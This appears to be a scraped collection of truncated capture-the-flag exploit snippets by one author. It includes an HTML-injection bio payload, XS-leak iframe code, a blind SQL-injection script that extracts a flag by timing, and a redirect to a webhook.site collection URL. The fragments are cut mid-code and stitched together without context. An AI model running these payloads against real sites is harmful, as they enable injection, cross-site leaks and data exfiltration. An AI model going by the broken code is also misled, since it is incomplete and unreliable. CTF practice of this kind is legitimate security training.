parrot409

#!/usr/bin/env python3
import requests

target = 'http://bluesocial.chal.perfect.blue:25005'
s = requests.session()
s.post(f'{target}/login',data={'username':'home'})
s.post(f'{target}/user/update',data={'bio':"""
    <!DOCTYPE html>
    <html lang='en'>
    <head>

parrot409

<a id=f >sdf</a>
<div id=t >
	
</div>
<script>
function addFrame(src,h){
	let el = document.createElement('iframe')
	el.src = src
	el.onload = h
	t.innerHTML = ''

parrot409

Leaky note

The challenge:

404 page XSLeak SSLeak? challenge but the session cookie's samsite attribute is Lax. We have HTML injection in one of the pages but there is a csp.

Content-Security-Policy "script-src 'none'; object-src 'none'; frame-ancestors 'none';";

parrot409

```html
<script>
const target = 'https://0.0.0.0/api/food/555??=`in()*?;select%20/*--%20%27&b%20%271*/%271%27from%20flag%20where%20randomblob((CASE%20WHEN%20(SUBSTR((SELECT%20flag%20FROM%20flag),IDX,1)%3d%27CHR%27)%20THEN%205000000%20ELSE%201%20END))--=dfdf'

const alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'

var flag = ''
async function atk(){
	let tbl = []
	for(let i=0;i<alphabet.length;i++){

parrot409

#!/usr/bin/env python3
# import requests_ as requests
# from requests_.auth import HTTPDigestAuth
# url = 'http://localhost:9990/management-upload'
# r = requests.post(url,headers={'Origin':'http://localhost:9990'},auth=HTTPDigestAuth('admin', 'admin')) 
# print(r.text)

import _socket
import math
import hashlib

parrot409

<?php
function conv($l){
	$g = unpack("C*", pack("Q",$l));
	$r = "";
	for($i=0;$i<8;$i++){
		if($g[$i] != 0){
			$r.= chr($g[$i]);
		}
	}
	return $r;

parrot409

<html>
	<head>
		<title>rem rem rem</title>
	</head>
	<body>
		<div id="atk">
			
		</div>
		<script>
			// const TARGET = "http://localhost:8000"

parrot409

<script>
document.location = "https://webhook.site/01b6b49c-2e31-4fa4-8e0d-f87f208586e4"
</script>

parrot409

f

parrot409

lmao